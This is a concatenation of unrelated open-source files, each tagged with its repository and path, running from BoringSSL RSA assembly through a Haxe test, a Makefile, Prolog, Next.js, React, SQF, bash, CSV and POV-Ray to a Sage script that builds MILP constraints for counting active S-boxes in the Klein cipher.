mov QWORD[64+rcx],rax
mov rax,r8
mov r9,QWORD[32+rdx]
mov r10,QWORD[40+rdx]
mov r11,QWORD[48+rdx]
shl r9,4
shl r10,33
mov r8,r11
shl r11,62
shr r8,2
add rax,r9
add rax,r10
add rax,r11
adc r8,0
mov QWORD[72+rcx],rax
mov rax,r8
mov r9,QWORD[56+rdx]
mov r10,QWORD[64+rdx]
shl r9,27
mov r11,r10
shl r10,56
shr r11,8
add rax,r9
add rax,r10
adc r11,0
mov QWORD[80+rcx],rax
mov rax,r11
mov r8,QWORD[72+rdx]
mov r9,QWORD[80+rdx]
shl r8,21
mov r10,r9
shl r9,50
shr r10,14
add rax,r8
add rax,r9
adc r10,0
mov QWORD[88+rcx],rax
mov rax,r10
mov r11,QWORD[88+rdx]
mov r8,QWORD[96+rdx]
shl r11,15
mov r9,r8
shl r8,44
shr r9,20
add rax,r11
add rax,r8
adc r9,0
mov QWORD[96+rcx],rax
mov rax,r9
mov r10,QWORD[104+rdx]
mov r11,QWORD[112+rdx]
shl r10,9
mov r8,r11
shl r11,38
shr r8,26
add rax,r10
add rax,r11
adc r8,0
mov QWORD[104+rcx],rax
mov rax,r8
mov r9,QWORD[120+rdx]
mov r10,QWORD[128+rdx]
mov r11,QWORD[136+rdx]
shl r9,3
shl r10,32
mov r8,r11
shl r11,61
shr r8,3
add rax,r9
add rax,r10
add rax,r11
adc r8,0
mov QWORD[112+rcx],rax
mov rax,r8
mov r9,QWORD[144+rdx]
mov r10,QWORD[152+rdx]
shl r9,26
mov r11,r10
shl r10,55
shr r11,9
add rax,r9
add rax,r10
adc r11,0
mov QWORD[120+rcx],rax
mov rax,r11
DB 0F3h,0C3h ;repret
global rsaz_1024_norm2red_avx2
ALIGN 32
rsaz_1024_norm2red_avx2:
sub rcx,-128
mov r8,QWORD[rdx]
mov eax,0x1fffffff
mov r9,QWORD[8+rdx]
mov r11,r8
shr r11,0
and r11,rax
mov QWORD[((-128))+rcx],r11
mov r10,r8
shr r10,29
and r10,rax
mov QWORD[((-120))+rcx],r10
shrd r8,r9,58
and r8,rax
mov QWORD[((-112))+rcx],r8
mov r10,QWORD[16+rdx]
mov r8,r9
shr r8,23
and r8,rax
mov QWORD[((-104))+rcx],r8
shrd r9,r10,52
and r9,rax
mov QWORD[((-96))+rcx],r9
mov r11,QWORD[24+rdx]
mov r9,r10
shr r9,17
and r9,rax
mov QWORD[((-88))+rcx],r9
shrd r10,r11,46
and r10,rax
mov QWORD[((-80))+rcx],r10
mov r8,QWORD[32+rdx]
mov r10,r11
shr r10,11
and r10,rax
mov QWORD[((-72))+rcx],r10
shrd r11,r8,40
and r11,rax
mov QWORD[((-64))+rcx],r11
mov r9,QWORD[40+rdx]
mov r11,r8
shr r11,5
and r11,rax
mov QWORD[((-56))+rcx],r11
mov r10,r8
shr r10,34
and r10,rax
mov QWORD[((-48))+rcx],r10
shrd r8,r9,63
and r8,rax
mov QWORD[((-40))+rcx],r8
mov r10,QWORD[48+rdx]
mov r8,r9
shr r8,28
and r8,rax
mov QWORD[((-32))+rcx],r8
shrd r9,r10,57
and r9,rax
mov QWORD[((-24))+rcx],r9
mov r11,QWORD[56+rdx]
mov r9,r10
shr r9,22
and r9,rax
mov QWORD[((-16))+rcx],r9
shrd r10,r11,51
and r10,rax
mov QWORD[((-8))+rcx],r10
mov r8,QWORD[64+rdx]
mov r10,r11
shr r10,16
and r10,rax
mov QWORD[rcx],r10
shrd r11,r8,45
and r11,rax
mov QWORD[8+rcx],r11
mov r9,QWORD[72+rdx]
mov r11,r8
shr r11,10
and r11,rax
mov QWORD[16+rcx],r11
shrd r8,r9,39
and r8,rax
mov QWORD[24+rcx],r8
mov r10,QWORD[80+rdx]
mov r8,r9
shr r8,4
and r8,rax
mov QWORD[32+rcx],r8
mov r11,r9
shr r11,33
and r11,rax
mov QWORD[40+rcx],r11
shrd r9,r10,62
and r9,rax
mov QWORD[48+rcx],r9
mov r11,QWORD[88+rdx]
mov r9,r10
shr r9,27
and r9,rax
mov QWORD[56+rcx],r9
shrd r10,r11,56
and r10,rax
mov QWORD[64+rcx],r10
mov r8,QWORD[96+rdx]
mov r10,r11
shr r10,21
and r10,rax
mov QWORD[72+rcx],r10
shrd r11,r8,50
and r11,rax
mov QWORD[80+rcx],r11
mov r9,QWORD[104+rdx]
mov r11,r8
shr r11,15
and r11,rax
mov QWORD[88+rcx],r11
shrd r8,r9,44
and r8,rax
mov QWORD[96+rcx],r8
mov r10,QWORD[112+rdx]
mov r8,r9
shr r8,9
and r8,rax
mov QWORD[104+rcx],r8
shrd r9,r10,38
and r9,rax
mov QWORD[112+rcx],r9
mov r11,QWORD[120+rdx]
mov r9,r10
shr r9,3
and r9,rax
mov QWORD[120+rcx],r9
mov r8,r10
shr r8,32
and r8,rax
mov QWORD[128+rcx],r8
shrd r10,r11,61
and r10,rax
mov QWORD[136+rcx],r10
xor r8,r8
mov r10,r11
shr r10,26
and r10,rax
mov QWORD[144+rcx],r10
shrd r11,r8,55
and r11,rax
mov QWORD[152+rcx],r11
mov QWORD[160+rcx],r8
mov QWORD[168+rcx],r8
mov QWORD[176+rcx],r8
mov QWORD[184+rcx],r8
DB 0F3h,0C3h ;repret
global rsaz_1024_scatter5_avx2
ALIGN 32
rsaz_1024_scatter5_avx2:
vzeroupper
vmovdqu ymm5,YMMWORD[$L$scatter_permd]
shl r8d,4
lea rcx,[r8*1+rcx]
mov eax,9
jmp NEAR $L$oop_scatter_1024
ALIGN 32
$L$oop_scatter_1024:
vmovdqu ymm0,YMMWORD[rdx]
lea rdx,[32+rdx]
vpermd ymm0,ymm5,ymm0
vmovdqu XMMWORD[rcx],xmm0
lea rcx,[512+rcx]
dec eax
jnz NEAR $L$oop_scatter_1024
vzeroupper
DB 0F3h,0C3h ;repret
global rsaz_1024_gather5_avx2
ALIGN 32
rsaz_1024_gather5_avx2:
vzeroupper
mov r11,rsp
lea rax,[((-136))+rsp]
$L$SEH_begin_rsaz_1024_gather5:
DB 0x48,0x8d,0x60,0xe0
DB 0xc5,0xf8,0x29,0x70,0xe0
DB 0xc5,0xf8,0x29,0x78,0xf0
DB 0xc5,0x78,0x29,0x40,0x00
DB 0xc5,0x78,0x29,0x48,0x10
DB 0xc5,0x78,0x29,0x50,0x20
DB 0xc5,0x78,0x29,0x58,0x30
DB 0xc5,0x78,0x29,0x60,0x40
DB 0xc5,0x78,0x29,0x68,0x50
DB 0xc5,0x78,0x29,0x70,0x60
DB 0xc5,0x78,0x29,0x78,0x70
lea rsp,[((-256))+rsp]
and rsp,-32
lea r10,[$L$inc]
lea rax,[((-128))+rsp]
vmovd xmm4,r8d
vmovdqa ymm0,YMMWORD[r10]
vmovdqa ymm1,YMMWORD[32+r10]
vmovdqa ymm5,YMMWORD[64+r10]
vpbroadcastd ymm4,xmm4
vpaddd ymm2,ymm0,ymm5
vpcmpeqd ymm0,ymm0,ymm4
vpaddd ymm3,ymm1,ymm5
vpcmpeqd ymm1,ymm1,ymm4
vmovdqa YMMWORD[(0+128)+rax],ymm0
vpaddd ymm0,ymm2,ymm5
vpcmpeqd ymm2,ymm2,ymm4
vmovdqa YMMWORD[(32+128)+rax],ymm1
vpaddd ymm1,ymm3,ymm5
vpcmpeqd ymm3,ymm3,ymm4
vmovdqa YMMWORD[(64+128)+rax],ymm2
vpaddd ymm2,ymm0,ymm5
vpcmpeqd ymm0,ymm0,ymm4
vmovdqa YMMWORD[(96+128)+rax],ymm3
vpaddd ymm3,ymm1,ymm5
vpcmpeqd ymm1,ymm1,ymm4
vmovdqa YMMWORD[(128+128)+rax],ymm0
vpaddd ymm8,ymm2,ymm5
vpcmpeqd ymm2,ymm2,ymm4
vmovdqa YMMWORD[(160+128)+rax],ymm1
vpaddd ymm9,ymm3,ymm5
vpcmpeqd ymm3,ymm3,ymm4
vmovdqa YMMWORD[(192+128)+rax],ymm2
vpaddd ymm10,ymm8,ymm5
vpcmpeqd ymm8,ymm8,ymm4
vmovdqa YMMWORD[(224+128)+rax],ymm3
vpaddd ymm11,ymm9,ymm5
vpcmpeqd ymm9,ymm9,ymm4
vpaddd ymm12,ymm10,ymm5
vpcmpeqd ymm10,ymm10,ymm4
vpaddd ymm13,ymm11,ymm5
vpcmpeqd ymm11,ymm11,ymm4
vpaddd ymm14,ymm12,ymm5
vpcmpeqd ymm12,ymm12,ymm4
vpaddd ymm15,ymm13,ymm5
vpcmpeqd ymm13,ymm13,ymm4
vpcmpeqd ymm14,ymm14,ymm4
vpcmpeqd ymm15,ymm15,ymm4
vmovdqa ymm7,YMMWORD[((-32))+r10]
lea rdx,[128+rdx]
mov r8d,9
$L$oop_gather_1024:
vmovdqa ymm0,YMMWORD[((0-128))+rdx]
vmovdqa ymm1,YMMWORD[((32-128))+rdx]
vmovdqa ymm2,YMMWORD[((64-128))+rdx]
vmovdqa ymm3,YMMWORD[((96-128))+rdx]
vpand ymm0,ymm0,YMMWORD[((0+128))+rax]
vpand ymm1,ymm1,YMMWORD[((32+128))+rax]
vpand ymm2,ymm2,YMMWORD[((64+128))+rax]
vpor ymm4,ymm1,ymm0
vpand ymm3,ymm3,YMMWORD[((96+128))+rax]
vmovdqa ymm0,YMMWORD[((128-128))+rdx]
vmovdqa ymm1,YMMWORD[((160-128))+rdx]
vpor ymm5,ymm3,ymm2
vmovdqa ymm2,YMMWORD[((192-128))+rdx]
vmovdqa ymm3,YMMWORD[((224-128))+rdx]
vpand ymm0,ymm0,YMMWORD[((128+128))+rax]
vpand ymm1,ymm1,YMMWORD[((160+128))+rax]
vpand ymm2,ymm2,YMMWORD[((192+128))+rax]
vpor ymm4,ymm4,ymm0
vpand ymm3,ymm3,YMMWORD[((224+128))+rax]
vpand ymm0,ymm8,YMMWORD[((256-128))+rdx]
vpor ymm5,ymm5,ymm1
vpand ymm1,ymm9,YMMWORD[((288-128))+rdx]
vpor ymm4,ymm4,ymm2
vpand ymm2,ymm10,YMMWORD[((320-128))+rdx]
vpor ymm5,ymm5,ymm3
vpand ymm3,ymm11,YMMWORD[((352-128))+rdx]
vpor ymm4,ymm4,ymm0
vpand ymm0,ymm12,YMMWORD[((384-128))+rdx]
vpor ymm5,ymm5,ymm1
vpand ymm1,ymm13,YMMWORD[((416-128))+rdx]
vpor ymm4,ymm4,ymm2
vpand ymm2,ymm14,YMMWORD[((448-128))+rdx]
vpor ymm5,ymm5,ymm3
vpand ymm3,ymm15,YMMWORD[((480-128))+rdx]
lea rdx,[512+rdx]
vpor ymm4,ymm4,ymm0
vpor ymm5,ymm5,ymm1
vpor ymm4,ymm4,ymm2
vpor ymm5,ymm5,ymm3
vpor ymm4,ymm4,ymm5
vextracti128 xmm5,ymm4,1
vpor xmm5,xmm5,xmm4
vpermd ymm5,ymm7,ymm5
vmovdqu YMMWORD[rcx],ymm5
lea rcx,[32+rcx]
dec r8d
jnz NEAR $L$oop_gather_1024
vpxor ymm0,ymm0,ymm0
vmovdqu YMMWORD[rcx],ymm0
vzeroupper
movaps xmm6,XMMWORD[((-168))+r11]
movaps xmm7,XMMWORD[((-152))+r11]
movaps xmm8,XMMWORD[((-136))+r11]
movaps xmm9,XMMWORD[((-120))+r11]
movaps xmm10,XMMWORD[((-104))+r11]
movaps xmm11,XMMWORD[((-88))+r11]
movaps xmm12,XMMWORD[((-72))+r11]
movaps xmm13,XMMWORD[((-56))+r11]
movaps xmm14,XMMWORD[((-40))+r11]
movaps xmm15,XMMWORD[((-24))+r11]
lea rsp,[r11]
DB 0F3h,0C3h ;repret
$L$SEH_end_rsaz_1024_gather5:
ALIGN 64
$L$and_mask:
DQ 0x1fffffff,0x1fffffff,0x1fffffff,0x1fffffff
$L$scatter_permd:
DD 0,2,4,6,7,7,7,7
$L$gather_permd:
DD 0,7,1,7,2,7,3,7
$L$inc:
DD 0,0,0,0,1,1,1,1
DD 2,2,2,2,3,3,3,3
DD 4,4,4,4,4,4,4,4
ALIGN 64
EXTERN __imp_RtlVirtualUnwind
ALIGN 16
rsaz_se_handler:
push rsi
push rdi
push rbx
push rbp
push r12
push r13
push r14
push r15
pushfq
sub rsp,64
mov rax,QWORD[120+r8]
mov rbx,QWORD[248+r8]
mov rsi,QWORD[8+r9]
mov r11,QWORD[56+r9]
mov r10d,DWORD[r11]
lea r10,[r10*1+rsi]
cmp rbx,r10
jb NEAR $L$common_seh_tail
mov r10d,DWORD[4+r11]
lea r10,[r10*1+rsi]
cmp rbx,r10
jae NEAR $L$common_seh_tail
mov rbp,QWORD[160+r8]
mov r10d,DWORD[8+r11]
lea r10,[r10*1+rsi]
cmp rbx,r10
cmovc rax,rbp
mov r15,QWORD[((-48))+rax]
mov r14,QWORD[((-40))+rax]
mov r13,QWORD[((-32))+rax]
mov r12,QWORD[((-24))+rax]
mov rbp,QWORD[((-16))+rax]
mov rbx,QWORD[((-8))+rax]
mov QWORD[240+r8],r15
mov QWORD[232+r8],r14
mov QWORD[224+r8],r13
mov QWORD[216+r8],r12
mov QWORD[160+r8],rbp
mov QWORD[144+r8],rbx
lea rsi,[((-216))+rax]
lea rdi,[512+r8]
mov ecx,20
DD 0xa548f3fc
$L$common_seh_tail:
mov rdi,QWORD[8+rax]
mov rsi,QWORD[16+rax]
mov QWORD[152+r8],rax
mov QWORD[168+r8],rsi
mov QWORD[176+r8],rdi
mov rdi,QWORD[40+r9]
mov rsi,r8
mov ecx,154
DD 0xa548f3fc
mov rsi,r9
xor rcx,rcx
mov rdx,QWORD[8+rsi]
mov r8,QWORD[rsi]
mov r9,QWORD[16+rsi]
mov r10,QWORD[40+rsi]
lea r11,[56+rsi]
lea r12,[24+rsi]
mov QWORD[32+rsp],r10
mov QWORD[40+rsp],r11
mov QWORD[48+rsp],r12
mov QWORD[56+rsp],rcx
call QWORD[__imp_RtlVirtualUnwind]
mov eax,1
add rsp,64
popfq
pop r15
pop r14
pop r13
pop r12
pop rbp
pop rbx
pop rdi
pop rsi
DB 0F3h,0C3h ;repret
section .pdata rdata align=4
ALIGN 4
DD $L$SEH_begin_rsaz_1024_sqr_avx2 wrt ..imagebase
DD $L$SEH_end_rsaz_1024_sqr_avx2 wrt ..imagebase
DD $L$SEH_info_rsaz_1024_sqr_avx2 wrt ..imagebase
DD $L$SEH_begin_rsaz_1024_mul_avx2 wrt ..imagebase
DD $L$SEH_end_rsaz_1024_mul_avx2 wrt ..imagebase
DD $L$SEH_info_rsaz_1024_mul_avx2 wrt ..imagebase
DD $L$SEH_begin_rsaz_1024_gather5 wrt ..imagebase
DD $L$SEH_end_rsaz_1024_gather5 wrt ..imagebase
DD $L$SEH_info_rsaz_1024_gather5 wrt ..imagebase
section .xdata rdata align=8
ALIGN 8
$L$SEH_info_rsaz_1024_sqr_avx2:
DB 9,0,0,0
DD rsaz_se_handler wrt ..imagebase
DD $L$sqr_1024_body wrt ..imagebase,$L$sqr_1024_epilogue wrt ..imagebase,$L$sqr_1024_in_tail wrt ..imagebase
DD 0
$L$SEH_info_rsaz_1024_mul_avx2:
DB 9,0,0,0
DD rsaz_se_handler wrt ..imagebase
DD $L$mul_1024_body wrt ..imagebase,$L$mul_1024_epilogue wrt ..imagebase,$L$mul_1024_in_tail wrt ..imagebase
DD 0
$L$SEH_info_rsaz_1024_gather5:
DB 0x01,0x36,0x17,0x0b
DB 0x36,0xf8,0x09,0x00
DB 0x31,0xe8,0x08,0x00
DB 0x2c,0xd8,0x07,0x00
DB 0x27,0xc8,0x06,0x00
DB 0x22,0xb8,0x05,0x00
DB 0x1d,0xa8,0x04,0x00
DB 0x18,0x98,0x03,0x00
DB 0x13,0x88,0x02,0x00
DB 0x0e,0x78,0x01,0x00
DB 0x09,0x68,0x00,0x00
DB 0x04,0x01,0x15,0x00
DB 0x00,0xb3,0x00,0x00
| Assembly | 4 | pdv-ru/ClickHouse | contrib/boringssl-cmake/win-x86_64/crypto/fipsmodule/rsaz-avx2.asm | [
"Apache-2.0"
] |
package cases.display.issues;
class Issue9470 extends DisplayTestCase {
/**
interface I {
function method():Void;
}
class C implements I {
public function new() {}
public function met{-1-}hod() {}
}
class Main {
static public function main() {
(new C() : I).{-2-}method{-3-}();
}
}
**/
function test(_) {
runHaxeJson([], DisplayMethods.FindReferences, {file: file, kind: WithBaseAndDescendants, offset: offset(1)});
var result = parseGotoDefinitionLocations();
Assert.same([range(2, 3)], result.map(l -> l.range));
Assert.pass();
}
}
| Haxe | 3 | wiltonlazary/haxe | tests/server/src/cases/display/issues/Issue9470.hx | [
"MIT"
] |
test:
VIMRUNNER_REUSE_SERVER=1 xvfb-run bundle exec rspec
# Run tests in dockerized Vims.
DOCKER_REPO:=blueyed/vim-python-pep8-indent-vims-for-test
DOCKER_TAG:=3
DOCKER_IMAGE:=$(DOCKER_REPO):$(DOCKER_TAG)
docker_image:
docker build -t $(DOCKER_REPO):$(DOCKER_TAG) .
docker_push:
docker push $(DOCKER_REPO):$(DOCKER_TAG)
docker_update_latest:
docker tag $(DOCKER_REPO):$(DOCKER_TAG) $(DOCKER_REPO):latest
docker push $(DOCKER_REPO):latest
test_docker: XVFB_ERRORFILE:=/dev/null
test_docker:
@set -x; export DISPLAY=$(if $(VIMRUNNER_TEST_DISPLAY),$(VIMRUNNER_TEST_DISPLAY),172.17.0.1:99; Xvfb -ac -listen tcp :99 >$(XVFB_ERRORFILE) 2>&1 & XVFB_PID=$$!); \
docker run --rm -ti -e DISPLAY -e VIMRUNNER_REUSE_SERVER=1 \
-v $(CURDIR):/vim-python-pep8-indent $(DOCKER_IMAGE) $(RSPEC_ARGS) \
$(if $(VIMRUNNER_TEST_DISPLAY),,; ret=$$?; kill $$XVFB_PID; exit $$ret)
test_coverage:
spec/make-coverage
| Makefile | 3 | JiHuDad/vimrc | sources_non_forked/vim-python-pep8-indent/Makefile | [
"MIT"
] |
:- load_foreign_files(['libudi_rtree'],[],udi_rtree_init).
:- op(700,xfx,'&&').
A '&&' B :-
attributes:get_all_atts(A,C),
attributes:put_att_term(A,overlap(C,B)).
| Prolog | 3 | ryandesign/yap | packages/udi/rtree/rtree.yap | [
"Artistic-1.0-Perl",
"ClArtistic"
] |
import Page from '../components/page'
import { initializeStore } from '../lib/store'
export default function SSG() {
return <Page />
}
// If you build and start the app, the date returned here will have the same
// value for all requests, as this method gets executed at build time.
// You will not see this while in development mode though.
export function getStaticProps() {
const zustandStore = initializeStore()
return {
props: {
// the "stringify and then parse again" piece is required as next.js
// isn't able to serialize it to JSON properly
initialZustandState: JSON.parse(JSON.stringify(zustandStore.getState())),
},
}
}
| JavaScript | 4 | nazarepiedady/next.js | examples/with-zustand/pages/ssg.js | [
"MIT"
] |
import React from "react"
import PropTypes from "prop-types"
import ImPropTypes from "react-immutable-proptypes"
export default class OperationServers extends React.Component {
static propTypes = {
// for self
path: PropTypes.string.isRequired,
method: PropTypes.string.isRequired,
operationServers: ImPropTypes.list,
pathServers: ImPropTypes.list,
setSelectedServer: PropTypes.func.isRequired,
setServerVariableValue: PropTypes.func.isRequired,
getSelectedServer: PropTypes.func.isRequired,
getServerVariable: PropTypes.func.isRequired,
getEffectiveServerValue: PropTypes.func.isRequired,
// utils
getComponent: PropTypes.func.isRequired
}
setSelectedServer = (server) => {
const { path, method } = this.props
// FIXME: we should be keeping up with this in props/state upstream of us
// instead of cheating™ with `forceUpdate`
this.forceUpdate()
return this.props.setSelectedServer(server, `${path}:${method}`)
}
setServerVariableValue = (obj) => {
const { path, method } = this.props
// FIXME: we should be keeping up with this in props/state upstream of us
// instead of cheating™ with `forceUpdate`
this.forceUpdate()
return this.props.setServerVariableValue({
...obj,
namespace: `${path}:${method}`
})
}
getSelectedServer = () => {
const { path, method } = this.props
return this.props.getSelectedServer(`${path}:${method}`)
}
getServerVariable = (server, key) => {
const { path, method } = this.props
return this.props.getServerVariable({
namespace: `${path}:${method}`,
server
}, key)
}
getEffectiveServerValue = (server) => {
const { path, method } = this.props
return this.props.getEffectiveServerValue({
server,
namespace: `${path}:${method}`
})
}
render() {
const {
// for self
operationServers,
pathServers,
// util
getComponent
} = this.props
if(!operationServers && !pathServers) {
return null
}
const Servers = getComponent("Servers")
const serversToDisplay = operationServers || pathServers
const displaying = operationServers ? "operation" : "path"
return <div className="opblock-section operation-servers">
<div className="opblock-section-header">
<div className="tab-header">
<h4 className="opblock-title">Servers</h4>
</div>
</div>
<div className="opblock-description-wrapper">
<h4 className="message">
These {displaying}-level options override the global server options.
</h4>
<Servers
servers={serversToDisplay}
currentServer={this.getSelectedServer()}
setSelectedServer={this.setSelectedServer}
setServerVariableValue={this.setServerVariableValue}
getServerVariable={this.getServerVariable}
getEffectiveServerValue={this.getEffectiveServerValue}
/>
</div>
</div>
}
}
| JSX | 5 | ilozano2/swagger-ui | src/core/plugins/oas3/components/operation-servers.jsx | [
"Apache-2.0"
] |
#include "script_component.hpp"
/*
Name: TFAR_fnc_revealInArea
Author: Dimitri Yuri, 2600K, Dedmen, Dorbedo
Event called upon receving a radio call
Arguments:
0: unit to be revealed <OBJECT>
1: distance <OBJECT|ARRAY>
Return Value:
None
Example:
[_unit, 50] call TFAR_ai_hearing_fnc_revealInArea;
Public: Yes
*/
params [["_unit", objNull, [objNull, []]], ["_distance", 5, [0]]];
TRACE_2(_unit,_distance);
{
if (!(isPlayer _x) &&
{!((vehicle _x) call TFAR_fnc_isVehicleIsolated)} &&
{_x knowsAbout _unit <= 1.5} &&
{((_x getVariable [QGVAR(lastReveal), 0]) - CBA_missiontime) < -20}) then {
_x setVariable [QGVAR(lastReveal), CBA_missiontime];
private _value = linearConversion [0, _distance, _unit distance _x, 3.5, 1.5, true];
TRACE_3("Revealing Unit",_unit,_x,_value);
[QGVAR(reveal), [_x, _unit, _value], _x] call CBA_fnc_targetEvent;
};
nil
} count (_unit nearEntities ["CAManBase", _distance * 0.95]);
| SQF | 4 | MrDj200/task-force-arma-3-radio | addons/ai_hearing/functions/fnc_revealInArea.sqf | [
"RSA-MD"
] |
contract_no,fund_seq_no,term_no,contract_type,internal_transfer_tag,prin_amt,start_date,end_date,region_code,credit_code
2020061000019011020164030595,202006100001901102016403059520200629,1,01,N,356,20200210,20200720,000000,
2020061000019011020164030596,202006100001901102016403059520200628,1,01,N,3561,20200310,20200720,000001,
2020061000019011020164030597,202006100001901102016403059520200627,1,01,N,3562,20200410,20200720,000002,33
2020061000019011020164030598,108319xx0185-202006100001901102016403059520200626,12,02,Y,26368,20200510,20200620,000003,
2020061000019011020164030599,202006100001901102016403059520200625,1,01,N,3960,20200610,20200720,000005,999 | CSV | 2 | WizardXiao/tidb | br/tests/lightning_column_permutation/data/perm.test_perm.0.csv | [
"Apache-2.0"
] |
#!/bin/bash
set -e
trap "echo Exit; exit;" SIGINT SIGTERM
CORE_URL="https://src.chromium.org/blink/trunk/Source/core/"
MODULE_URL="https://src.chromium.org/blink/trunk/Source/modules/"
mkdir -p blink-idl/core
mkdir -p blink-idl/modules
echo "Fetching core idl files..."
rm tmp/ -rf
svn co $CORE_URL tmp -q
for IDL in $(find tmp/ -iname '*.idl' -type f -printf '%P\n')
do
echo "- $IDL"
mv "tmp/$IDL" blink-idl/core
done
echo "Fetching modules idl files..."
rm tmp/ -rf
svn co $MODULE_URL tmp -q
for IDL in $(find tmp/ -iname '*.idl' -type f -printf '%P\n')
do
echo "- $IDL"
mv "tmp/$IDL" blink-idl/modules
done
rm tmp/ -rf
| Shell | 3 | coreyscherbing/angular | packages/zone.js/scripts/grab-blink-idl.sh | [
"MIT"
] |
#version 3.6;
// Right-handed coordinate system in which the z-axis points upwards
camera {
location <30,-50,25>
sky z
right -0.05*x*image_width/image_height
up 0.05*z
look_at <0,0,0>
}
// White background
background{rgb 1}
// Two lights with slightly different colors
light_source{<-8,-20,30> color rgb <0.77,0.75,0.75>}
light_source{<25,-12,12> color rgb <0.38,0.40,0.40>}
// Radius of the Voronoi cell network
#declare r=0.008;
// Voronoi cells
union{
#include "FRAME"
pigment{rgb <1,0.4,0.45>} finish{specular 0.5 ambient 0.42}
}
| POV-Ray SDL | 3 | softwarecapital/chr1shr.voro | examples/no_release/rad_test.pov | [
"BSD-3-Clause-LBNL"
] |
# This script implements a toolkit for counting active S-boxes using Mixed-Integer
# Linear Programming for Klein from the paper by N. Mouha, Q. Wang, D. Gu, and B. Preneel,
# "Differential and Linear Cryptanalysis using Mixed-Integer Linear Programming,"
# in Information Security and Cryptology - Inscrypt 2011,
# Lecture Notes in Computer Science, Springer-Verlag, 20 pages, 2011."(available at
# http://www.cosic.esat.kuleuven.be/publications/article-2080.pdf)
# and was downloaded from (http://www.ecrypt.eu.org/tools/)
#
# This work was done in the context of an internship done at NXP
# under supervision of Ventzislav Nikov <vetnzislav.nikov@nxp.com>
# and is published under MIT license:
# =============================================================================
# Copyright (C) 2012 Laura Winnen <laura.winnen@gmail.com>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
#=============================================================================
#-- Klein --
# Counting the minimal number of active S-boxes for Klein using "Coin" solver in Sage.
# (at least version 5.0 is required, other solvers are possible)
# - Differential cryptanalysis non-related key setting
# - Any number of rounds (default 5)
#Writes the constraints implied by the mixNibbles operation to the file f
#in: i1,i2,i3,i4,i5,i6,i7,i8 (nibble inputs to MN), o1,o2,o3,o4,o5,o6,o7,o8 (nibble outputs from MN), m1,m2,m3,m4 (byte inputs to MN), #mo1,mo2,mo3,mo4 (byte inputs to MN), d (dummy variable), f (file to write to)
#out: \
def EqMC(i1,i2,i3,i4,i5,i6,i7,i8,o1,o2,o3,o4,o5,o6,o7,o8,m1,m2,m3,m4,mo1,mo2,mo3,mo4,d,f):
f.write("p.add_constraint(x["+str(i1)+"] + x["+str(i2)+"] - m["+str(m1)+"] >= 0)"+'\n')
f.write("p.add_constraint(x["+str(i3)+"] + x["+str(i4)+"] - m["+str(m2)+"] >= 0)"+'\n')
f.write("p.add_constraint(x["+str(i5)+"] + x["+str(i6)+"] - m["+str(m3)+"] >= 0)"+'\n')
f.write("p.add_constraint(x["+str(i7)+"] + x["+str(i8)+"] - m["+str(m4)+"] >= 0)"+'\n')
f.write("p.add_constraint(m["+str(m1)+"] - x["+str(i1)+"] >= 0)"+'\n')
f.write("p.add_constraint(m["+str(m1)+"] - x["+str(i2)+"] >= 0)"+'\n')
f.write("p.add_constraint(m["+str(m2)+"] - x["+str(i3)+"] >= 0)"+'\n')
f.write("p.add_constraint(m["+str(m2)+"] - x["+str(i4)+"] >= 0)"+'\n')
f.write("p.add_constraint(m["+str(m3)+"] - x["+str(i5)+"] >= 0)"+'\n')
f.write("p.add_constraint(m["+str(m3)+"] - x["+str(i6)+"] >= 0)"+'\n')
f.write("p.add_constraint(m["+str(m4)+"] - x["+str(i7)+"] >= 0)"+'\n')
f.write("p.add_constraint(m["+str(m4)+"] - x["+str(i8)+"] >= 0)"+'\n')
#MC operation has differential/linear branch number equal to 5
f.write("p.add_constraint(m["+str(m1)+"] + m["+str(m2)+"] + m["+str(m3)+"] + m["+str(m4)+"] + m["+str(mo1)+"] + m["+str(mo2)+"] + m["+str(mo3)+"] + m["+str(mo4)+"] - 5*d["+str(d)+"] >= 0)"+'\n')
f.write("p.add_constraint(d["+str(d)+"] - m["+str(m1)+"] >= 0)"+'\n')
f.write("p.add_constraint(d["+str(d)+"] - m["+str(m2)+"] >= 0)"+'\n')
f.write("p.add_constraint(d["+str(d)+"] - m["+str(m3)+"] >= 0)"+'\n')
f.write("p.add_constraint(d["+str(d)+"] - m["+str(m4)+"] >= 0)"+'\n')
f.write("p.add_constraint(d["+str(d)+"] - m["+str(mo1)+"] >= 0)"+'\n')
f.write("p.add_constraint(d["+str(d)+"] - m["+str(mo2)+"] >= 0)"+'\n')
f.write("p.add_constraint(d["+str(d)+"] - m["+str(mo3)+"] >= 0)"+'\n')
f.write("p.add_constraint(d["+str(d)+"] - m["+str(mo4)+"] >= 0)"+'\n')
f.write("p.add_constraint(x["+str(o1)+"] + x["+str(o2)+"] - m["+str(mo1)+"] >= 0)"+'\n')
f.write("p.add_constraint(x["+str(o3)+"] + x["+str(o4)+"] - m["+str(mo2)+"] >= 0)"+'\n')
f.write("p.add_constraint(x["+str(o5)+"] + x["+str(o6)+"] - m["+str(mo3)+"] >= 0)"+'\n')
f.write("p.add_constraint(x["+str(o7)+"] + x["+str(o8)+"] - m["+str(mo4)+"] >= 0)"+'\n')
f.write("p.add_constraint(m["+str(mo1)+"] - x["+str(o1)+"] >= 0)"+'\n')
f.write("p.add_constraint(m["+str(mo1)+"] - x["+str(o2)+"] >= 0)"+'\n')
f.write("p.add_constraint(m["+str(mo2)+"] - x["+str(o3)+"] >= 0)"+'\n')
f.write("p.add_constraint(m["+str(mo2)+"] - x["+str(o4)+"] >= 0)"+'\n')
f.write("p.add_constraint(m["+str(mo3)+"] - x["+str(o5)+"] >= 0)"+'\n')
